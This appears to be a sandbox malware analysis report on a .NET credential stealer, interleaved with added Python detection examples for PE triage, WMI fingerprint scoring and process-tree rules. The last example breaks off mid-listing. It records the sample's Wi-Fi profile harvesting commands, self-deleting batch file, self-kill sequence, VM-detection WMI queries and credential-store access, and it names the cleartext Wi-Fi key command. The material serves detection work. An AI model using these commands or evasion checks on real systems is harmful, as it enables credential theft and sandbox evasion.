                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nlaapi.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netsetupapi.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netiohlp.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dhcpcsvc.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winnsi.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshhttp.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: httpapi.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshipsec.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: userenv.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: activeds.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: polstore.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winipsec.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: adsldpc.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshwfp.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cabinet.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: p2pnetsh.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: p2p.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cryptbase.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rpcnsh.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: whhelper.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winhttp.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wlancfg.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cryptsp.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wlanapi.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wshelper.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wevtapi.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mswsock.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: peerdistsh.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: uxtheme.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wcmapi.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rmclient.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mobilenetworking.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: slc.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: sppc.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: gpapi.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ktmw32.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mprmsg.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: windows.storage.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: msasn1.dll
                        Source: C:\Windows\SysWOW64\findstr.exe | Section loaded: edgegdi.dll
                        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
                        Source: C:\Windows\SysWOW64\chcp.com | Section loaded: ulib.dll
                        Source: C:\Windows\SysWOW64\chcp.com | Section loaded: fsutilext.dll
                        Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: version.dll
                        Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: mpr.dll
                        Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: framedynos.dll
                        Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: dbghelp.dll
                        Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: srvcli.dll
                        Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: netutils.dll
                        Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: edgegdi.dll
                        Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: wbemcomn.dll
                        Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: winsta.dll
                        Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: amsi.dll
                        Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: userenv.dll
                        Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
                        Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: edgegdi.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: Window Recorder | Window detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: zyEDYRU0jw.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: zyEDYRU0jw.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: zyEDYRU0jw.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: System.Xml.ni.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*\~ source: zyEDYRU0jw.exe, 00000000.00000002.108454398630.000000000725C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.ni.pdbRSDS source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: Stealer.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Management.pdbz_ source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\tdata source: zyEDYRU0jw.exe, 00000000.00000002.108454398630.000000000725C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\Malware\Desktop\Arcane\Str\Stealer\Stealer\obj\Release\Stealer.pdb source: zyEDYRU0jw.exe
                        Source: Binary string: System.Configuration.ni.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Net.Http.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Security.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: Stealer.pdbMZ source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Configuration.pdbSystem.Core.ni.dll> source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.IO.Compression.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Configuration.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Xml.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Xml.ni.pdbRSDS# source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Core.ni.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Windows.Forms.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: _prod.pdb\* source: zyEDYRU0jw.exe, 00000000.00000002.108454398630.0000000007232000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: mscorlib.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Net.Http.ni.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Management.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Drawing.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: mscorlib.ni.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Management.ni.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.pdb4 source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Core.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: mscorlib.ni.pdbRSDS] source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: INETCO~1INetCookies_prod.pdb3475e564b17091598996e6f, source: zyEDYRU0jw.exe, 00000000.00000002.108454398630.00000000071C0000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.IO.Compression.pdbH source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Net.Http.ni.pdbRSDS source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: mscorlib.pdbH source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.ni.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Core.ni.pdbRSDS source: WER8074.tmp.dmp.17.dr
Source: zyEDYRU0jw.exe; Static PE information: TimeDateStamp 0xB880F835 [Fri Feb 3 01:58:13 2068 UTC]
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; Code function: 0_2_0871FF58 push esp; retf 0_2_0871FF69
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; Code function: 0_2_0871FF36 push esp; retf 0_2_0871FF37
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; Code function: 0_2_0889050B push FFFFFFE8h; iretd 0_2_0889050D
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; Process information set: NOOPENFILEERRORBOX (88 identical entries)
Source: C:\Windows\SysWOW64\tasklist.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe; Process information set: NOOPENFILEERRORBOX (2 identical entries)
Source: C:\Windows\SysWOW64\cmd.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX (15 identical entries)
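The static PE findings above (populated IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR and IMAGE_DIRECTORY_ENTRY_DEBUG directories, DllCharacteristics HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE, a TimeDateStamp of 0xB880F835 that decodes to the year 2068, and an embedded PDB path naming the project "Arcane\Str\Stealer") are what a triage script should pull from a managed binary before detonation. The following is an added example written for this page; it is not code from the Joe Sandbox report or from the sample. It parses the COFF and optional headers from raw bytes, decodes the DllCharacteristics bits, reports which data directories are populated (a non-empty COM descriptor marks a CLR image), and flags a TimeDateStamp whose top bit is set. Roslyn deterministic builds store a content hash with the high bit set in that field, which is why the 2068 date is consistent with a compiler artifact rather than a time-stomped binary; that interpretation is the example's assumption about this sample, not a finding of the report. The input is a constructed minimal PE32 header carrying the report's values, not the sample's bytes; offsets follow the PE/COFF specification.

```python
import struct
from datetime import datetime, timezone

# IMAGE_OPTIONAL_HEADER.DllCharacteristics bits (PE/COFF specification)
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",
    0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT",
    0x0200: "NO_ISOLATION",
    0x0400: "NO_SEH",
    0x0800: "NO_BIND",
    0x1000: "APPCONTAINER",
    0x2000: "WDM_DRIVER",
    0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}

# Data directory slots that matter when triaging a managed executable
DATA_DIRECTORIES = {6: "IMAGE_DIRECTORY_ENTRY_DEBUG", 14: "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR"}


def parse_pe_triage(data: bytes) -> dict:
    """Extract TimeDateStamp, DllCharacteristics and populated data directories from a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")

    coff = e_lfanew + 4
    # IMAGE_FILE_HEADER starts: Machine(2) NumberOfSections(2) TimeDateStamp(4)
    machine, _nsections, timestamp = struct.unpack_from("<HHI", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:        # PE32: NumberOfRvaAndSizes at +92, directories at +96
        dirs_off, ndirs_off = 96, 92
    elif magic == 0x20B:      # PE32+: NumberOfRvaAndSizes at +108, directories at +112
        dirs_off, ndirs_off = 112, 108
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")

    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]   # same offset in PE32 and PE32+
    ndirs = struct.unpack_from("<I", data, opt + ndirs_off)[0]

    present = []
    for idx, name in DATA_DIRECTORIES.items():
        if idx < ndirs:
            rva, size = struct.unpack_from("<II", data, opt + dirs_off + idx * 8)
            if rva and size:
                present.append(name)

    # Roslyn /deterministic writes a content hash with bit 31 set into TimeDateStamp,
    # so a date past 2038 is a compiler artifact, not evidence of a tampered build time.
    deterministic = bool(timestamp & 0x80000000)
    when = datetime.fromtimestamp(timestamp, tz=timezone.utc)

    return {
        "machine": machine,
        "timestamp": timestamp,
        "timestamp_utc": when.strftime("%Y-%m-%d %H:%M:%S"),
        "deterministic_build": deterministic,
        "dll_characteristics": [n for bit, n in sorted(DLL_CHARACTERISTICS.items()) if dll_chars & bit],
        "is_managed": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR" in present,
        "data_directories": present,
    }


def build_sample_header() -> bytes:
    """Constructed PE32 header carrying the values the report lists (not the sample's real bytes)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                       # e_lfanew
    # Machine=I386, 3 sections, TimeDateStamp from the report, no symbols, 224-byte optional header
    coff = struct.pack("<HHIIIHH", 0x14C, 3, 0xB880F835, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                       # PE32 magic
    struct.pack_into("<H", opt, 70, 0x8560)                     # the five flags the report names
    struct.pack_into("<I", opt, 92, 16)                         # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 6 * 8, 0x2000, 0x1C)      # DEBUG directory (rva, size)
    struct.pack_into("<II", opt, 96 + 14 * 8, 0x2008, 0x48)     # COM descriptor / CLR header
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    for key, value in parse_pe_triage(build_sample_header()).items():
        print(f"{key}: {value}")
```

Run against a real file with `parse_pe_triage(open(path, "rb").read())`; the function only reads headers, so it is safe to point at a live sample. A populated COM descriptor together with a 2038+ timestamp whose top bit is set is the normal signature of a modern .NET build, so neither should be scored as anti-analysis on its own.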

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_PointingDevice
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT EstimatedChargeRemaining, BatteryStatus FROM Win32_Battery
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Model, Size FROM Win32_DiskDrive
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, MACAddress, Speed FROM Win32_NetworkAdapter WHERE MACAddress IS NOT NULL
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Description, MACAddress, IPEnabled FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = TRUE
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, Default FROM Win32_Printer
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT DeviceID, FileSystem, FreeSpace, Size FROM Win32_LogicalDisk WHERE DriveType = 3
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_SoundDevice
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; Memory allocated: 1830000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; Memory allocated: 3280000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; Memory allocated: 3080000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; Window / User API: threadDelayed 9859
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer, SMBIOSBIOSVersion, ReleaseDate FROM Win32_BIOS
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Product, Manufacturer, SerialNumber FROM Win32_BaseBoard
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, NumberOfCores, MaxClockSpeed FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; File opened: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\35\
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Credentials\
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\ClientSidePhishing\25\_metadata\
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments\
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\ARM\Reader_21.005.20060\
Source: zyEDYRU0jw.exe; Binary or memory string: VMware
Source: zyEDYRU0jw.exe; Binary or memory string: Hyper-V
Source: zyEDYRU0jw.exe; Binary or memory string: IsVirtualMachine
Source: zyEDYRU0jw.exe; Binary or memory string: virtualqemu
Source: zyEDYRU0jw.exe, 00000000.00000002.108454398630.000000000725C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: zyEDYRU0jw.exe; Binary or memory string: <IsVirtualMachine>b__1_0
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe; Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe; Process token adjusted: Debug
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; Memory allocated: page read and write | page guard
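The WQL statements above enumerate physical memory, pointing devices, battery, disks, network adapters, printers, logical disks, sound devices, BIOS, baseboard and CPU in one burst. Any one of them is ordinary inventory; the set, issued by a freshly dropped executable that also carries the strings VMware, Hyper-V, virtualqemu and a method named IsVirtualMachine, is a hardware fingerprint used to decide whether the host is a VM or sandbox. The following added example (written for this page, not code from the report or the sample) extracts the target class from each WQL statement and scores a process's query set by how many distinct fingerprinting classes it touches, counting classes rather than queries so a repeated query cannot inflate the score. The class list and the threshold are the example's own choices; Win32_ComputerSystem is included because it belongs to the same pattern even though this report does not show it. The input lines are constructed from the queries the report attributes to the sample, plus the SecurityCenter2 AntivirusProduct query listed further down; in production they would come from WMI-Activity tracing or EDR telemetry, which the example assumes rather than collects.

```python
import re
from collections import Counter
from typing import List, Optional

# WMI classes that, queried together, fingerprint hardware to separate VMs/sandboxes from real hosts.
# The value notes what a typical analysis VM exposes differently from a physical machine.
FINGERPRINT_CLASSES = {
    "win32_physicalmemory": "small, round RAM capacity",
    "win32_pointingdevice": "missing or generic mouse",
    "win32_battery": "no battery on most VMs, present on laptops",
    "win32_diskdrive": "hypervisor disk model strings, small sizes",
    "win32_networkadapter": "hypervisor vendor MAC prefixes",
    "win32_networkadapterconfiguration": "hypervisor vendor MAC prefixes",
    "win32_printer": "no printers installed in sandboxes",
    "win32_logicaldisk": "small free space and total size",
    "win32_sounddevice": "no audio device in sandboxes",
    "win32_bios": "hypervisor BIOS vendor and version",
    "win32_baseboard": "hypervisor baseboard and serial",
    "win32_processor": "low core count, hypervisor CPU name",
    "win32_computersystem": "hypervisor manufacturer/model (added here, not seen in this report)",
}

# Separate bucket: enumerating installed AV (defense evasion rather than VM detection)
SECURITY_CLASSES = {"antivirusproduct"}

WQL_FROM = re.compile(r"\bFROM\s+([A-Za-z0-9_]+)", re.IGNORECASE)


def wql_class(query: str) -> Optional[str]:
    """Return the lower-cased class a WQL SELECT targets, or None if no FROM clause is found."""
    m = WQL_FROM.search(query)
    return m.group(1).lower() if m else None


def score_wmi_queries(queries: List[str], threshold: int = 5) -> dict:
    """Classify one process's WQL queries and decide whether they look like sandbox fingerprinting."""
    classes = Counter(c for c in (wql_class(q) for q in queries) if c)
    fingerprint_hits = sorted(c for c in classes if c in FINGERPRINT_CLASSES)
    security_hits = sorted(c for c in classes if c in SECURITY_CLASSES)
    score = len(fingerprint_hits)  # distinct classes, not raw query count
    return {
        "distinct_classes": len(classes),
        "fingerprint_classes": fingerprint_hits,
        "fingerprint_score": score,
        "av_enumeration": bool(security_hits),
        "verdict": "likely VM/sandbox fingerprinting" if score >= threshold else "inventory-like",
    }


# Constructed input: the ExecQuery strings the report attributes to zyEDYRU0jw.exe
SAMPLE_QUERIES = [
    "SELECT Capacity FROM Win32_PhysicalMemory",
    "SELECT Name FROM Win32_PointingDevice",
    "SELECT EstimatedChargeRemaining, BatteryStatus FROM Win32_Battery",
    "SELECT Model, Size FROM Win32_DiskDrive",
    "SELECT Name, MACAddress, Speed FROM Win32_NetworkAdapter WHERE MACAddress IS NOT NULL",
    "SELECT Description, MACAddress, IPEnabled FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = TRUE",
    "SELECT Capacity FROM Win32_PhysicalMemory",
    "SELECT Name, Default FROM Win32_Printer",
    "SELECT DeviceID, FileSystem, FreeSpace, Size FROM Win32_LogicalDisk WHERE DriveType = 3",
    "SELECT Name FROM Win32_SoundDevice",
    "SELECT Manufacturer, SMBIOSBIOSVersion, ReleaseDate FROM Win32_BIOS",
    "SELECT Product, Manufacturer, SerialNumber FROM Win32_BaseBoard",
    "SELECT Name, NumberOfCores, MaxClockSpeed FROM Win32_Processor",
    "Select * from AntivirusProduct",
]

if __name__ == "__main__":
    print(score_wmi_queries(SAMPLE_QUERIES))
```

Group queries per process (and per short time window) before scoring; an inventory agent will touch many of the same classes over a day, while a stealer touches them all within seconds of starting.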

HIPS / PFW / Operating System Protection Evasion

Source: zyEDYRU0jw.exe, Killer.cs; Reference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)
Source: zyEDYRU0jw.exe, ImportHider.cs; Reference to suspicious API methods: LoadLibrary(dllName)
Source: zyEDYRU0jw.exe, ImportHider.cs; Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(intPtr, methodName), typeof(T))
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklist
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp5FE0.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp5FE0.tmp.bat
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 4524
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /Nobreak
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 4524
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; Queries volume information: C:\Users\user\Desktop\zyEDYRU0jw.exe VolumeInformation
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
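The process tree above is the part of this run that is cheapest to detect from standard process-creation telemetry: cmd.exe running chcp 65001 (UTF-8 output so the text parses predictably) and then netsh wlan show profiles piped through findstr All to list saved Wi-Fi profile names; a temporary .bat executed with /C and deleted on the same command line; and taskkill /F followed by Timeout /T 2 /Nobreak under the same cmd.exe, with the sample's own PID 4524 as the target. Two practitioner caveats: taskkill's /IM switch takes an image name, so TaskKill /F /IM 4524 does not address the process by PID (the switch for that is /PID), and a rule should therefore key on the kill, wait, delete sequence rather than on the switch being used correctly; and the profile listing shown here is the first half of the technique, the usual second half being netsh wlan show profile name=<SSID> key=clear, which this report does not show but which any rule should cover. The following is an added example written for this page, not code from the report or the sample: it evaluates those patterns over constructed Sysmon-style process-creation records that reproduce the command lines listed above (PIDs other than 4524 are invented for the example).

```python
import re
from collections import defaultdict

# Constructed process-creation events (not the report's raw telemetry) carrying the
# command lines listed in the report. PID 4524 is the sample's; other PIDs are invented.
EVENTS = [
    {"pid": 4524, "ppid": 1000, "image": r"C:\Users\user\Desktop\zyEDYRU0jw.exe", "cmd": "zyEDYRU0jw.exe"},
    {"pid": 5000, "ppid": 4524, "image": r"C:\Windows\SysWOW64\cmd.exe", "cmd": '"cmd.exe" /c tasklist'},
    {"pid": 5001, "ppid": 5000, "image": r"C:\Windows\SysWOW64\tasklist.exe", "cmd": "tasklist"},
    {"pid": 5010, "ppid": 4524, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmd": '"cmd" /C chcp 65001 && netsh wlan show profiles | findstr All'},
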